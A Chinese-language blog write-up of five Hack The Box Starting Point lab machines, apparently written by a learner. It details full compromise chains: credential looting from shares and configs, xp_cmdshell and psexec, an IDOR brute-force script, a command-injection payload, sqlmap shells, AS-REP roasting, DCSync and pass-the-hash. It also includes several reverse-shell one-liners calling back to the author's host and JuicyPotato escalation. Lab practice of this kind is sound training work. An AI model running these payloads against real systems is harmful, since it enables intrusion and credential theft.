xXxYOLOxXx

xXxYOLOxXx

HTB_Start_Point

Posted on Edited on In

借着HTB多学一些Windows下的渗透技巧

Archetype

Windows

端口扫描

1
2
3
4
5
6
7
8
9
10
11
nmap -sV -sT -Pn 10.10.10.27

Nmap scan report for 10.10.10.27
Host is up (0.51s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp open  ms-sql-s     Microsoft SQL Server 2017 14.00.1000
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

漏洞利用

用smbmap先扫描一波SMB服务

1
2
smbmap -H 10.10.10.27
[+] IP: 10.10.10.27:445	Name: 10.10.10.27

随便加个用户名

1
2
3
4
5
6
7
8
smbmap -H 10.10.10.27 -u test
[+] Guest session   	IP: 10.10.10.27:445	Name: 10.10.10.27                                       
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	backups                                           	READ ONLY	
	C$                                                	NO ACCESS	Default share
	IPC$                                              	READ ONLY	Remote IPC

空密码即可登入

1
2
3
4
5
6
7
8
9
10
11
smbclient \\\\10.10.10.27\\backups -U test
Enter WORKGROUP\test's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Fri Jun  4 12:10:59 2021
  ..                                  D        0  Fri Jun  4 12:10:59 2021
  prod.dtsConfig                     AR      609  Mon Jan 20 20:23:02 2020
  schtasks.txt                        A   174006  Fri Jun  4 12:05:57 2021
  services.txt                        A     6370  Fri Jun  4 12:10:59 2021

		10328063 blocks of size 4096. 8165400 blocks available
1
2
smb: \> get prod.dtsConfig
getting file \prod.dtsConfig of size 609 as prod.dtsConfig (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
1
2
3
4
5
6
7
8
<DTSConfiguration>
    <DTSConfigurationHeading>
        <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>"/>
    </DTSConfigurationHeading>
    <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
        <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
    </Configuration>
</DTSConfiguration>

得到MSSQL账户ARCHETYPE\sql_svc:M3g4c0rp123

这里使用impacket来登入

https://github.com/SecureAuthCorp/impacket

可以执行系统命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
python mssqlclient.py ARCHETYPE/sql_svc@10.10.10.27  -windows-auth
Impacket v0.9.23.dev1+20210528.195232.25c62f65 - Copyright 2020 SecureAuth Corporation

Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'.
[*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232) 
[!] Press help for extra shell commands
SQL> enable_xp_cmdshell
[*] INFO(ARCHETYPE): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(ARCHETYPE): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> xp_cmdshell whoami
output                                                                             

--------------------------------------------------------------------------------   

archetype\sql_svc                                                                  

NULL                                                                               

SQL> xp_cmdshell type C:\users\sql_svc\desktop\user.txt
output                                                                             

--------------------------------------------------------------------------------   

3e7b102e78218e935bf3f4951fec21a3

权限提升

C:\users\sql_svc\appdata为隐藏路径, 需要使用dir /a

1
2
3
4
5
6
7
8
9
10
SQL> xp_cmdshell type C:\users\sql_svc\appdata\roaming\microsoft\windows\powershell\psreadline\ConsoleHost_history.txt
output                                                                             

--------------------------------------------------------------------------------   

net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!            

exit                                                                               

NULL

通过查看powershell的历史记录得到administrator的账户

Archetype\administrator:MEGACORP_4dm1n!!

在使用impacket中的psexec.py来得到管理员权限的Shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
python psexec.py archetype/administrator@10.10.10.27
Impacket v0.9.23.dev1+20210528.195232.25c62f65 - Copyright 2020 SecureAuth Corporation

Password:
[*] Requesting shares on 10.10.10.27.....
[*] Found writable share ADMIN$
[*] Uploading file OFvCNrQJ.exe
[*] Opening SVCManager on 10.10.10.27.....
[*] Creating service SMtb on 10.10.10.27.....
[*] Starting service SMtb.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>type C:\users\administrator\desktop\root.txt
b91ccec3305e98240082d4474b848528

尝试不使用psexec运行管理员权限命令的一波三折

Windows下可以使用runas命令来以其他用户的身份运行命令
runas /savecred /user:administrator whoami
但是不能直接通过参数输入密码

1
2
3
runas /savecred /user:administrator whoami
试图将 whoami 作为用户 "DOMAIN\administrator" 启动...
输入 administrator 的密码:

密码的输入需要以交互式的方式来输入, 就无法在MSSQL的非交互式Shell中直接提权

而可以使用sanur这个工具来进行密码的命令行输入

1
runas /savecred /user:administrator whoami | sanur.exe password

但是紧接着问题又来了
runas貌似不会在当前cmd窗口运行命令而是在一个新的cmd中运行, 这样的话就不能在MSSQL的Shell中看到回显

所以尝试了文件写入保存命令运行结果的方法

1
runas /savecred /user:administrator "cmd /c whoami > C:\1" | sanur.exe password

本地运行成功了, 但是目标机器不行(无奈)

Oopsie

Linux

端口扫描

1
2
3
4
5
6
7
8
9
nmap -sV -sT -Pn 10.10.10.28

Nmap scan report for 10.10.10.28
Host is up (0.68s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE   VERSION
22/tcp open  ssh       OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp   open     http            Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

漏洞利用

在首页的源码看到这样一条JS

1
<script src="/cdn-cgi/login/script.js"></script>

得到路径/cdn-cgi/login

访问该路径即为登入页面
这里的登入需要使用上一台靶机的Administrator密码, 有点坑
admin:MEGACORP_4dm1n!!

访问/cdn-cgi/login/admin.php?content=uploads
提示This action require super admin rights.
Cookie中的内容为user=34322; role=admin
那么只要能够得到super adminid值与username即可越权

/cdn-cgi/login/admin.php?content=accounts&id=1
访问该路径可以得到admin的账户信息
可以通过爆破参数id来得到super admin的信息

1
2
3
4
5
6
7
8
9
10
import re
import requests
req = requests.session()
headers = {"Cookie":"user=34322; role=admin"}
for _ in range(0, 999):
    url = "http://10.10.10.28/cdn-cgi/login/admin.php?content=accounts&id={}".format(_)
    res = req.get(url, headers = headers)
    if "super" in res.text:
        print(_)
        exit()

id为30, 得到如下信息

1
2
Access ID   Name            Email
86575       super admin     superadmin@megacorp.com

通过在Burpsuite中修改Cookie为Cookie: user=86575; role=super admin来访问/cdn-cgi/login/admin.php?content=uploads
上传weevely的Shell即可获得权限

权限提升

使用python反弹Shell到本机

1
2
3
python3 -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.16.51',9996));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
-------
nc -lvnp 9996

获得tty
(好像是用于获取一个终端会话, 否则后续的切换用户操作无法进行)

1
python3 -c 'import pty;pty.spawn("/bin/bash")'

之前查看用户信息的页面应该用到了SQL的操作
那么就可以去找SQL的配置信息

1
2
3
4
5
6
7
cat /var/www/html/cdn-cgi/login/db.php

<i/login$ cat cat /var/www/html/cdn-cgi/login/db.php
cat: cat: No such file or directory
<?php
$conn = mysqli_connect('localhost','robert','M3g4C0rpUs3r!','garage');
?>

得到账户信息robert:M3g4C0rpUs3r!

使用该账户信息切换到用户robert

1
2
3
4
5
su robert
M3g4C0rpUs3r!
cat /home/robert/user.txt

f2c74ee8db7983851ab2a96a44eb7981

查找有SUID权限的文件

1
find / -user root -perm -4000 -print 2>/dev/null

看到一个有意思的文件

1
/usr/bin/bugtracker

而该用户也有运行权限

1
2
3
4
5
ls -la /usr/bin/bugtracker
-rwsr-xr-- 1 root bugtracker 8792 Jan 25  2020 /usr/bin/bugtracker

id
uid=1000(robert) gid=1000(robert) groups=1000(robert),1001(bugtracker)

IDA中分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
int __cdecl main(int argc, const char **argv, const char **envp)
{
  __uid_t v3; // eax
  const char *v4; // rax
  char v7[24]; // [rsp+10h] [rbp-20h] BYREF
  unsigned __int64 v8; // [rsp+28h] [rbp-8h]

  v8 = __readfsqword(0x28u);
  printf("%s", "\n------------------\n: EV Bug Tracker :\n------------------\n\n");
  printf("Provide Bug ID: ");
  __isoc99_scanf("%s", v7);
  printf("%s", "---------------\n\n");
  v3 = geteuid();
  setuid(v3);
  v4 = (const char *)concat("cat /root/reports/", v7);
  system(v4);
  putchar(10);
  return __readfsqword(0x28u) ^ v8;
}
  • 用户输入v7
  • v7被拼接到"cat /root/reports/"之后在赋值给v4
  • 执行v4

命令注入

Payload: ;cat$IFS$9/root/root.txt

1
2
3
4
5
6
7
8
9
10
11
./bugtracker

------------------
: EV Bug Tracker :
------------------

Provide Bug ID: ;cat$IFS$9/root/root.txt
---------------

cat: /root/reports/: Is a directory
af13b0bee69f8a877c3faf667f7beacf

Archetype

Linux

端口扫描

1
2
3
4
5
6
7
8
9
10
nmap -sV -sT -Pn 10.10.10.46

Nmap scan report for 10.10.10.46
Host is up (0.59s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

漏洞利用

The credentials ftpuser / mc@F1l3ZilL4 can be used to login to the FTP server. – 官方WP

尝试使用上台靶机中获取的ftp凭据ftpuser/mc@F1l3ZilL4登录靶机的ftp服务
https://blog.csdn.net/qianxiaoyiran311/article/details/105988795

得到FTP账户

1
ftpuser:mc@F1l3ZilL4

登入FTP服务

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
ftp 10.10.10.46
Connected to 10.10.10.46.
220 (vsFTPd 3.0.3)
Name (10.10.10.46:root): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0            2533 Feb 03  2020 backup.zip
226 Directory send OK.
ftp> get backup.zip
local: backup.zip remote: backup.zip
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for backup.zip (2533 bytes).
226 Transfer complete.
2533 bytes received in 0.23 secs (10.7549 kB/s)

爆破加密压缩包backup.zip

1
2
3
fcrackzip backup.zip -D -p /usr/share/wordlists/rockyou.txt -u

PASSWORD FOUND!!!!: pw == 741852963

查看index.php

1
2
3
4
5
6
7
8
9
<?php
session_start();
  if(isset($_POST['username']) && isset($_POST['password'])) {
    if($_POST['username'] === 'admin' && md5($_POST['password']) === "2cb42f8734ea607eefed3b70af13bbd3") {
      $_SESSION['login'] = "true";
      header("Location: dashboard.php");
    }
  }
?>

爆破Hash

1
2
3
4
5
6
7
8
9
10
echo -n "2cb42f8734ea607eefed3b70af13bbd3" > passwd
john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt passwd
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
qwerty789        (?)
1g 0:00:00:00 DONE (2021-06-05 19:16) 33.33g/s 3340Kp/s 3340Kc/s 3340KC/s shunda..pogimo
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session complete

登入Web页面, 看到一个搜索功能
使用sqlmap来getshell

1
sqlmap -u "http://10.10.10.46/dashboard.php?search=1" --os-shell

sqlmap给出的shell不是很好用, 自己再弹个Shell

1
2
3
rm /tmp/y;mkfifo /tmp/y;cat /tmp/y|/bin/bash -i 2>&1|nc 10.10.16.51 9996 >/tmp/y
------
nc -lvnp 9996

权限提升

查看数据库信息

1
2
3
cat /var/www/html/dashboard.php

$conn = pg_connect("host=localhost port=5432 dbname=carsdb user=postgres password=P@s5w0rd!");

得到账户

1
postgres:P@s5w0rd!

SSH登入

1
2
ssh postgres@10.10.10.46
P@s5w0rd!

查看sudo权限

1
2
3
4
5
6
7
8
9
sudo -l
[sudo] password for postgres: P@s5w0rd!

Matching Defaults entries for postgres on vaccine:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User postgres may run the following commands on vaccine:
    (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf

vi提权

1
2
/bin/vi /etc/postgresql/11/main/pg_hba.conf
:shell
1
2
cat /root/root.txt
dd6e058e814260bc70e9bbdef2715849

来自上一台靶机的FTP账户

本着实践出真知的精神, 再看了一下上一台靶机Oopsie的端口开放情况

1
2
3
4
5
6
7
8
9
netstat -antlp
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      1205/mysqld         
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      800/systemd-resolve 
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      1120/sshd           
tcp        0    235 10.10.10.28:41042       10.10.16.51:9996        ESTABLISHED 2166/python3        
tcp6       0      0 :::80                   :::*                    LISTEN      1260/apache2        
tcp6       0      0 :::22                   :::*                    LISTEN      1120/sshd           
tcp6       0      0 10.10.10.28:80          10.10.16.51:58936       ESTABLISHED 1963/apache2

并没有FTP服务, 那么就是可能这种靶机顺序关系的变更

我个人不是很认同这种把敏感信息放在其他靶机泄露的设计
确切来说, 不应该把这种通过其他靶机泄露敏感信息作为唯一的攻击链
在给出这样的一条攻击链的时候应该再给出另外一个攻击链
虽然这样的确能够对于连续的靶机渗透, 或者说多层靶机渗透的带来更加贯通的体验
但是出现了这种顺序变更的情况之后就会显得十分弄巧成拙, 而且没有应有的后续修改
没有user.txt也只是给这台机器的2.7分锦上添花了

Shield

Windows

端口扫描

1
2
3
4
5
6
7
8
9
nmap -sV -sT -Pn 10.10.10.29

Nmap scan report for 10.10.10.29
Host is up (0.38s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Microsoft IIS httpd 10.0
3306/tcp open  mysql   MySQL (unauthorized)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

路径扫描

扫描到路径/wordpress
其实根本没扫, 网络环境太差了, 直接看WP的

漏洞利用

1
2
3
4
5
6
7
8
9
wpscan --url http://10.10.10.29/wordpress/ -e u

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://10.10.10.29/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

使用上一台靶机的密码P@s5w0rd!
得到账户admin:P@s5w0rd!
拳头硬了

登入之后修改插件的代码
直接写个Shell进去
然后访问/wordpress/wp-content/plugins/mesmerize-companion/src/Companion.php即可

权限提升

蚁剑连WebShell
上传nc再弹Shell回来

1
2
3
nc64.exe -e C:\windows\system32\cmd.exe 10.10.16.51 9996
-------
nc -lvnp 9996
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
systeminfo

Host Name:                 SHIELD
OS Name:                   Microsoft Windows Server 2016 Standard
OS Version:                10.0.14393 N/A Build 14393
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Member Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00376-30000-00299-AA303
Original Install Date:     2/4/2020, 12:58:01 PM
System Boot Time:          6/5/2021, 8:21:33 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              VMware, Inc. VMW71.00V.13989454.B64.1906190538, 6/19/2019
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume2
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory:     2,047 MB
Available Physical Memory: 753 MB
Virtual Memory: Max Size:  2,431 MB
Virtual Memory: Available: 1,015 MB
Virtual Memory: In Use:    1,416 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    MEGACORP.LOCAL
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Ethernet0 2
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.29
                                 [02]: fe80::98f9:2cd0:ff27:3fbc
                                 [03]: dead:beef::98f9:2cd0:ff27:3fbc
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

没有打补丁的Windows Server 2016 Standard
用烂土豆提权
https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe

写一个反弹Shell的bat脚本

1
echo start C:\temp\nc64.exe -e cmd.exe 10.10.16.51 9995 > C:\temp\shell.bat

当时因为用linux的习惯就用了双引号把要写入的内容括了起来, 但是Windows会很蛋疼得把双引号也写入, 然后就导致了当时一直不能提权

看一下权限

1
2
3
4
5
6
7
8
9
10
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name          Description                               State  
======================= ========================================= =======
SeChangeNotifyPrivilege Bypass traverse checking                  Enabled
SeImpersonatePrivilege  Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects                     Enabled

如果开启SeImpersonate权限,juicypotato的参数可以使用-t t
如果开启SeAssignPrimaryToken权限,juicypotato的参数可以使用-t u
如果均开启,可以选择-t *
如果均未开启,那么无法提权
https://blog.csdn.net/god_zzZ/article/details/106334702

然后在项目上找一个Windows Server 2016 Standard的CLSID

1
2
3
JuicyPotato.exe -t t -p C:\temp\shell.bat -l 6666 -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}
------
nc -lvnp 9995
1
2
type c:\users\administrator\desktop\root.txt
6e9a9fdc6f64e410a68b847bb4b404fa

Pathfinder

对于域控的攻击有点超出的我的知识范围了

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
nmap -sV -sT -p 1-10000 10.10.10.30

Nmap scan report for 10.10.10.30
Host is up (0.57s latency).
Not shown: 9987 closed ports
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-06-08 13:22:07Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: Host: PATHFINDER; OS: Windows; CPE: cpe:/o:microsoft:windows

使用上一台靶机的凭证sandra:Password1234!来枚举AD的信息 – 官方WP

1
bloodhound-python -d megacorp.local -u sandra -p "Password1234!" -gc pathfinder.megacorp.local -c all -ns 10.10.10.30
1
2
neo4j console
bloodhound

json打包为zip后放进bloodhound
自己用在kali用bloodhound的时候总是莫名其妙的崩溃, 只能在windows上使用了
需要改一下neo4j所监听的ip, 默认是监听本地环回, 需要改成一个windows上能够访问到的ip

通过分析Find Principals with DCSync Rights
可以看到用户SVC_BES有权限GetChanges&GetchangesAll

“With both GetChanges and GetChangesAll privileges in BloodHound, you may perform a dcsync attack to get the password hash of an arbitrary principal using mimikatz”
https://bloodhound.readthedocs.io/en/latest/data-analysis/edges.html#getchanges-getchangesall

mimikatz有一个dcsync功能, 可以利用卷影拷贝服务直接读取ntds.dll文件并检索域散列值。
《内网安全攻防》 P.296

如果能够拿到用户svc_bes的凭证, 就能够使用dcsync攻击
所以尝试获取用户svc_bes的Hash

1
2
3
4
python GetNPUsers.py megacorp.local/svc_bes -request -no-pass -dc-ip 10.10.10.30

[*] Getting TGT for svc_bes
$krb5asrep$23$svc_bes@MEGACORP.LOCAL:9b7a931e1152a4631d23173e921373ee$7282d47fdf6ebddcd09f8233636ee97c971b39333ded23097d3fb59c4fb1dfbd772cb3b08b8a8f40a69f69a07f242e0ee2520878b707ab9769208ba2bd6faa76c0a79b39384ef588651127c3164fff013b53d0968d4047dad049b46747b52629c6c9b92427fc7bd6dca13a923bdb833ca9273c2018b605a9eeb0c24005b5ba8988b76952db3a31f6b14f165bd0613e7130ee1bc93cb9a0e4f7a018cbf3913b935778e860d3236d2763b56d871e236e98ea041bbb5b15ebf3138ca16214a758b24194d968320151e58d09a89c2d08e4576ab789076cba4096b4fb328965611663cbe588eafd5bf19af71293701d8a220e

爆破Hash

1
2
3
john --wordlist=/usr/share/wordlists/rockyou.txt hash

Sheffield19      ($krb5asrep$23$svc_bes@MEGACORP.LOCAL)

这里本来打算用psexec直接登入, 但是出现了权限不足的错误
python psexec.py megacorp.local/svc_bes@10.10.10.30

使用Winrm服务登入

1
2
3
evil-winrm -i 10.10.10.30 -u svc_bes -p Sheffield19
type C:\users\svc_bes\desktop\user.txt
b05fb166688a8603d970c6d033f637f1

dcsync攻击

1
2
secretsdump.py -dc-ip 10.10.10.30 megacorp.local/svc_bes:Sheffield19@10.10.10.30
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18:::

使用Hash登入

1
2
3
python psexec.py megacorp.local/administraor@10.10.10.30 -hashes aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18
type c:\users\administrator\desktop\root.txt
ee613b2d048303e5fd4ac6647d944645

几台靶机下来还是学到了不少东西
还是自己太菜了
剩下的StartPoint靶机需要VIP才能访问
等哪天心血来潮开了VIP再说吧

EOF